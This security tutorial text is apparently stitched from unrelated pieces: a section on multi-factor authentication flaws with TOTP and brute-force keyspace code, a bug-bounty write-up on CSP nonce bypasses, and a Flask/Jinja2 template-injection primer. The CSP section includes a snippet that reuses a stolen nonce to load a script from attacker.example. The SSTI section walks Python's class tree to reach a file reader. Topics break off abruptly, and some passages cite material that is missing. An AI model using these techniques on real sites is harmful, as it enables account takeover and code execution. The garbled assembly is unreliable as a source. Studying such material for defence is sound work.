In this section, we'll look at some of the vulnerabilities that can occur in multi-factor authentication mechanisms. We've also provided several interactive labs to demonstrate how you can exploit these vulnerabilities in multi-factor authentication.
While it is sometimes possible for an attacker to obtain a single knowledge-based factor, such as a password, being able to simultaneously obtain another factor from an out-of-band source is considerably less likely. For this reason, two-factor authentication is demonstrably more secure than single-factor authentication. However, as with any security measure, it is only ever as secure as its implementation. Poorly implemented two-factor authentication can be beaten, or even bypassed entirely, just as single-factor authentication can.
It is also worth noting that the full benefits of multi-factor authentication are only achieved by verifying multiple different factors. Verifying the same factor in two different ways is not true two-factor authentication. Email-based 2FA is one such example. Although the user has to provide a password and a verification code, accessing the code only relies on them knowing the login credentials for their email account. Therefore, the knowledge authentication factor is simply being verified twice.
Verification codes are usually read by the user from a physical device of some kind. Many high-security websites now provide users with a dedicated device for this purpose, such as the RSA token or keypad device that you might use to access your online banking or work laptop. In addition to being purpose-built for security, these dedicated devices also have the advantage of generating the verification code directly. It is also common for websites to use a dedicated mobile app, such as Google Authenticator, for the same reason.
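Under the hood, authenticator apps like Google Authenticator derive these codes from a shared secret and the current time (TOTP, standardized in RFC 6238, built on HOTP from RFC 4226). A minimal sketch using only the Python standard library — the secret and parameters below are illustrative, not tied to any particular provider:

```python
import hmac
import hashlib
import struct
import time

def hotp(secret, counter, digits=6):
    # HMAC-SHA1 over the big-endian 8-byte counter (RFC 4226)
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation: low nibble of last byte
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

def totp(secret, for_time=None, step=30, digits=6):
    # TOTP = HOTP over the current 30-second time window (RFC 6238)
    t = int((time.time() if for_time is None else for_time) // step)
    return hotp(secret, t, digits)

# Both the app and the server compute the same code from the shared secret,
# so nothing needs to be transmitted at login time besides the code itself.
code = totp(b"12345678901234567890")
```

Because the code is computed independently on both sides, there is no message in transit to intercept — which is exactly the advantage over SMS-delivered codes discussed below.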
On the other hand, some websites send verification codes to a user's mobile phone as a text message. While this is technically still verifying the factor of "something you have", it is open to abuse. Firstly, the code is being transmitted via SMS rather than being generated by the device itself. This creates the potential for the code to be intercepted. There is also a risk of SIM swapping, whereby an attacker fraudulently obtains a SIM card with the victim's phone number. The attacker would then receive all SMS messages sent to the victim, including the one containing their verification code.
If the user is first prompted to enter a password, and then prompted to enter a verification code on a separate page, the user is effectively in a "logged in" state before they have entered the verification code. In this case, it is worth testing to see if you can directly skip to "logged-in only" pages after completing the first authentication step. Occasionally, you will find that a website doesn't actually check whether or not you completed the second step before loading the page.
Sometimes flawed logic in two-factor authentication means that after a user has completed the initial login step, the website doesn't adequately verify that the same user is completing the second step.
This is extremely dangerous if the attacker is then able to brute-force the verification code as it would allow them to log in to arbitrary users' accounts based entirely on their username. They would never even need to know the user's password.
As with passwords, websites need to take steps to prevent brute-forcing of the 2FA verification code. This is especially important because the code is often a simple 4 or 6-digit number. Without adequate brute-force protection, cracking such a code is trivial.
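To see why, consider the size of the keyspace. A quick sketch (the request rate is illustrative and assumes no rate limiting):

```python
# A 6-digit numeric code has only 10^6 possible values.
def all_codes(digits=6):
    """Yield every possible zero-padded verification code."""
    for i in range(10 ** digits):
        yield f"{i:0{digits}d}"

keyspace = 10 ** 6
rate = 100  # requests per second -- illustrative, assumes no throttling
hours = keyspace / rate / 3600
print(f"{keyspace} codes, exhausted in about {hours:.1f} hours")  # about 2.8 hours
```

A 4-digit code shrinks the keyspace to 10,000, which at the same rate falls in under two minutes.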
Some websites attempt to prevent this by automatically logging a user out if they enter a certain number of incorrect verification codes. This is ineffective in practice because an advanced attacker can even automate this multi-step process by creating macros for Burp Intruder. The Turbo Intruder extension can also be used for this purpose.
A CSP works by restricting what the content of the loaded document is allowed to do. This is done by declaring a list of policy directives (through a CSP header or through meta tags), each consisting of a directive name and a list of allowed sources for that directive.
In the case of XSS, the most interesting directive is script-src, as it describes how the document is allowed to load JavaScript. Two common ways to set up a script-src directive are the whitelist approach and the (often safer) nonce-based approach. When a nonce is specified in the CSP, any script on the page is allowed to load, but only as long as its script tag is decorated with the same nonce value.
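As an illustration, under a policy like the following (the nonce value is of course just a placeholder), only the first script would execute:

```html
<!-- Response header: Content-Security-Policy: script-src 'nonce-r4nd0m' -->
<script nonce="r4nd0m">console.log("runs: nonce matches");</script>
<script src="https://evil.example/x.js"></script> <!-- blocked: no nonce -->
```

For this to be effective, the nonce must be unpredictable and regenerated on every response.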
If a site is instead using a whitelist of URLs, the page runs the risk that one of those URLs hosts a dangerous library that an attacker can abuse to escalate an injection to full XSS. One library that often causes CSP bypasses is AngularJS, but there is an abundance of other script sources that can be abused.
A feature of CSP that tends to confuse people, both when implementing it and when trying to find bypasses, is when a nonce is declared in the script-src directive together with the keyword strict-dynamic. This combination will allow any script with a nonce attribute to inject additional script elements into the DOM and have them execute, even if these new script tags lack the declared nonce value. This combination of nonce and strict-dynamic will also make the page ignore any additional whitelisted URLs in the script-src directive.
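To illustrate, under a policy such as script-src 'nonce-r4nd0m' 'strict-dynamic' (placeholder nonce), a nonced script propagates trust to scripts it creates programmatically:

```html
<script nonce="r4nd0m">
  // Trusted via the nonce; with 'strict-dynamic', scripts it inserts
  // via createElement/appendChild are trusted too, even without a nonce.
  const s = document.createElement('script');
  s.src = '/bundle.js';  // executes despite carrying no nonce
  document.head.appendChild(s);
</script>
```

Note that this trust propagation only applies to non-parser-inserted scripts; markup written via document.write or innerHTML remains blocked.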
As we can see, there is a nonce but no strict-dynamic keyword. As we now know, this means that any URL in the whitelist is allowed as a script source. The list probably contains multiple URLs that host dangerous gadgets (see a tweet by @renniepak for a gadget using -analytics.com), but the interesting one for us is the one shown in the CTF writeup. (Also note that the CSP evaluator does not know about the AngularJS package in reCAPTCHA.)
This is described in the HTML spec here, and there is also an interesting discussion about it here. From JavaScript, we just need to access the nonce attribute of a DOM node using the regular node.nonce notation. To find a node carrying the current page nonce, we can query the DOM for any element with a nonce attribute.
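A sketch of that lookup (the URL is a placeholder; this assumes the attacker has already gained script execution through a gadget):

```js
// Browsers hide the nonce value from getAttribute(), but the [nonce]
// selector still matches, and the value is exposed as a property.
const nonce = document.querySelector('[nonce]').nonce;

// Reuse it to load an arbitrary external script under the CSP.
const s = document.createElement('script');
s.nonce = nonce;
s.src = 'https://attacker.example/payload.js';  // hypothetical URL
document.body.appendChild(s);
```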
I verified that this worked as a full CSP bypass on Twitter.com, but at that time, @godiego had already gotten help from another researcher. Still, I was happy with what I had crafted and thought that I might be able to use it elsewhere.
In this blog post, Gareth examines a third-party dependency called Piwik PRO and finds a CSP bypass hidden inside it using an AngularJS vector. If they had deployed the dependency, they would have opened up a hole in their defense. Gareth writes:
Any individual website component can undermine the security of the entire site, and analytics platforms are no exception. With this in mind, we decided to do a quick audit of Piwik PRO to make sure it was safe to deploy on portswigger.net.
Sometimes, in bug bounties, the stars align. I went to portswigger.net to check out their CSP, and to my surprise, the same setup from Twitter was present. The CSP had a whitelist containing both and , which both host the about/js/main.min.js file containing Angular JS. The CSP also had a nonce configured but lacked the strict-dynamic keyword, just as on Twitter.com.
What this meant was that I could use the same payload as on Twitter to bypass the CSP on PortSwigger.net. The only issue was that I had no HTML injection to tie the bypass to. I spent some time looking for such an injection to use for a full exploit but did not feel too motivated to keep at it. I decided to report the CSP issue as is and point to the blog post from Gareth.
After an initial fix, I also pointed out that they were lacking the form-action directive, which could lead to credential leaks, and they decided to fix that as well. They awarded me a bounty of $1,000 for the CSP bypass and a bonus of $500 for the form-action issue.
Flask, a lightweight Python web application framework, is one of my favorite and most-used tools. While it is great for building simple APIs and microservices, it can also be used for fully-fledged web applications relying on server-side rendering. To do so, Flask depends on the powerful and popular Jinja2 templating engine.
Fundamentally, SSTI is all about misusing the templating system and syntax to inject malicious payloads into templates. As these are rendered on the server, they provide a possible vector for remote code execution. For a more thorough introduction, definitely have a look at this great article by PortSwigger.
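The core mistake can be reproduced in a few lines: concatenating user input into the template source instead of passing it as data. The payload below is the classic arithmetic probe; all names are illustrative.

```python
from jinja2 import Template

user_input = "{{ 7 * 7 }}"  # attacker-controlled probe

# Vulnerable: the input becomes part of the template source itself,
# so Jinja2 evaluates the expression during rendering.
vulnerable = Template("Hello " + user_input).render()
print(vulnerable)  # Hello 49

# Safe: the input is passed as data and rendered as plain text.
safe = Template("Hello {{ name }}").render(name=user_input)
print(safe)  # Hello {{ 7 * 7 }}
```

Seeing the arithmetic evaluated (49 instead of the literal payload) is the usual first confirmation that a template injection exists.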
Jinja2 is a powerful templating engine used in Flask. While it does many more things, it essentially allows us to write HTML templates with placeholders that are later dynamically populated by the application.
Also, it is important to realize that Jinja2 has a quite elaborate templating syntax. Instead of just placeholders, we can also have, for example, loops and conditions in these templates. Most importantly, however, the placeholders have access to the actual objects passed via Flask. If we are, for example, passing a list example_list, we can use example_list[0] as we would in our regular Python code.
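A small example of what such a template can do — a placeholder, a loop, and direct indexing into a passed-in list (the names are illustrative):

```python
from jinja2 import Template

# {{ ... }} evaluates an expression; {% ... %} is a statement such as a loop.
template = Template(
    "First: {{ example_list[0] }}\n"
    "{% for item in example_list %}- {{ item }}\n{% endfor %}"
)
print(template.render(example_list=["a", "b"]))
# First: a
# - a
# - b
```

It is exactly this expression power — indexing, attribute access, method calls on real Python objects — that SSTI payloads build on.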
In Python, everything is an object! While this is a fundamental property and feature of the language, we are going to focus on one very particular thing one can do: navigating the inheritance tree of objects and, thus, classes.
In the following example, we are trying to read a file called test.txt using _io.FileIO. However, instead of just using regular function calls, we will start from a str object and work our way to the _io.FileIO class.
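A runnable sketch of that walk. The file test.txt is created first so the example is self-contained; in a real exploitation scenario the target file would already exist on the server.

```python
import os
import tempfile

# Create the file we will read back, so the example is self-contained.
path = os.path.join(tempfile.mkdtemp(), "test.txt")
with open(path, "w") as f:
    f.write("hello from test.txt")

# Walk the inheritance tree: str -> object -> _IOBase -> _RawIOBase -> FileIO.
# object.__subclasses__() only lists *direct* subclasses, so we descend a
# level at a time rather than expecting FileIO right under object.
obj = "".__class__.__mro__[-1]  # <class 'object'>, root of the tree
iobase = next(c for c in obj.__subclasses__() if c.__name__ == "_IOBase")
rawio = next(c for c in iobase.__subclasses__() if c.__name__ == "_RawIOBase")
file_cls = next(c for c in rawio.__subclasses__() if c.__name__ == "FileIO")

# file_cls is _io.FileIO, reached without ever naming it or calling open().
data = file_cls(path).read().decode()
print(data)  # hello from test.txt
```

The same chain can be written as a single expression inside a Jinja2 placeholder, which is why access to any ordinary object is enough to reach sensitive classes.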
Do not let this confuse or discourage you! Ultimately, we are still working with a regular file object. However, instead of just using, for example, open(), we navigated to it starting from a str object.
Also, keep in mind that there are many ways to get to the same destination. This was, for demonstration purposes, a very extensive example. Feel free to explore better (i.e., shorter) ways of getting the same result!